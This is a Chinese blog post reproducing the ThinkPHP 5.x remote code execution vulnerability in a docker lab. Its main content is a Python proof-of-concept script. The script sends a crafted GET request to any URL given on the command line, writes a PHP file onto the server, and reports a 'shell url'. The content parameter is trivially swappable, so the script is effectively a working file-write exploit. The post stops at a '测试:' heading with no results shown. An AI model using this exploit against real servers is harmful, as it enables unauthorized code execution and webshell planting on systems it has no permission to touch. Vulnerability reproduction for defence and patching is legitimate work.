layout: post
cid: 69
title: ThinkPHP任意代码执行漏洞复现
slug: 69
date: ‘2018/12/12 17:02:00’
updated: ‘2019/01/22 10:50:52’
status: publish
author: 夜莺
categories:

ThinkPHP任意代码执行漏洞复现

一、漏洞描述

由于 ThinkPHP 框架对控制器名没有进行足够严格的检测,导致在没有开启强制路由的情况下,攻击者可以在服务端执行任意恶意代码。
经过本地复现确认,攻击者仅仅通过一个 HTTP GET 请求,就可以完成漏洞的利用,执行任意代码。以执行 phpinfo() 为例。

二、影响范围

ThinkPHP 5.0.x < 5.0.23
ThinkPHP 5.1.x < 5.1.31

三、漏洞复现

利用docker搭建好环境启动
访问192.168.1.93:8181
构造poc:

  1. #!/usr/bin/env python
  2. #coding:utf-8
  3. import sys
  4. import requests
  5. def tpgetshell(url):
  6.     headers={
  7.         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  8.         "Accept-Encoding": "gzip, deflate",
  9.         "Accept-Language": "zh-CN,zh;q=0.9",
  10.         "Cache-Control": "max-age=0",
  11.         "Connection": "keep-alive",
  12.         "Upgrade-Insecure-Requests": "1",
  13.         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36",
  14.     }
  15.     r = requests.get(url=url,headers=headers) 
  16.     print "phpinfo写入成功"
  17.     print "shell url:"+sys.argv[1] + "/phpinfo.php"
  18. if __name__ == '__main__':
  19.     if len(sys.argv) != 2:
  20.         print "python http://www.xxx.com/"
  21.     else:
  22.         poc = "/?s=index/\\think\\template\\driver\\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E"
  23.         url = sys.argv[1] + poc
  24.         tpgetshell(url)

测试: